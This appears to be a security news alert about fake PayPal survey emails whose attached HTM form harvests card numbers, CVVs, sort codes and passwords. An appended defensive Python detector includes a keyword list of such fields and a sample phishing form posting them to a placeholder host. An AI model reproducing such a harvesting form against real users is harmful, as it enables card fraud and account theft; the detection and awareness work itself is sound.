Phishing Alert: PayPal Is Launching a New Survey Program


Cybercriminals are trying to trick unsuspecting Internet users into handing over their personal and financial information with the aid of fake PayPal emails, which claim that the payment processor has launched a new survey program.

It starts with an email that reads something like this:

“As today 23 February 2014, PayPal is launching a new survey program. All customers are welcome to participate this survey. The survey will take 5 minutes and for your effort and understanding PayPal will select most of the customers that takes this survey and reward them with £25.00 GBP.

It would be helpful if you fill it out right now. If that is not possible, please do it soon. We plan to close the survey on 23 February 2014, so do not delay. Please note that all responses will be confidential.

To start completing the Survey please download the attachement form and follow the steps to open a secure browser window.”

Security experts from Malwarebytes have analyzed this scheme. They warn that the archive file attached to the emails contains an HTM page that instructs users to answer a few questions.

The answers to these questions are not important. What is important, at least for the cybercriminals running this scam, is that users enter the information in the second part of the form.

Victims are asked to hand over their name, address, city, postal code, date of birth, payment card number, expiration date, CVV, sort code, and password.

The submitted information is transmitted to a server controlled by the cybercriminals. These details can be more than enough for the crooks to perform fraudulent transactions with victims’ credit cards.
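A defensive check for the kind of attachment described above, as an added example that is not from the original article or from Malwarebytes' analysis: it parses an HTML attachment and flags forms that post payment-card or password fields to a remote host. The field keywords, the sample page and the host `collector.example` are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed keywords for the fields this scam requests (card, expiry, CVV, sort code, password, DOB).
SENSITIVE = ("card", "cvv", "cvc", "expir", "sortcode", "sort_code", "passw", "dob", "birth")

class FormAudit(HTMLParser):
    """Collect each <form>'s action URL and the sensitive inputs inside it."""
    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form> seen
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "sensitive": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            label = (a.get("name", "") + " " + a.get("id", "")).lower()
            if a.get("type", "").lower() == "password" or any(k in label for k in SENSITIVE):
                self._current["sensitive"].append(a.get("name") or a.get("id") or "password")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def suspicious_forms(html_text, min_fields=2):
    """Return forms that send at least min_fields sensitive inputs to a remote host."""
    parser = FormAudit()
    parser.feed(html_text)
    hits = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname  # None for relative or empty actions
        if host and len(form["sensitive"]) >= min_fields:
            hits.append({"host": host, "fields": form["sensitive"]})
    return hits

# Constructed sample attachment; collector.example is a placeholder host.
SAMPLE = """<html><body>
<form action="http://collector.example/save.php" method="post">
<input type="radio" name="q1" value="yes"><input type="text" name="fullname">
<input type="text" name="cardnumber"><input type="text" name="cvv">
<input type="text" name="sortcode"><input type="password" name="pp_pass">
</form></body></html>"""
```

A mail gateway or triage script could call `suspicious_forms()` on every `.htm`/`.html` file extracted from an attached archive and quarantine messages that return a hit.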

In case you come across such emails, remember that PayPal will never ask for such information via email.

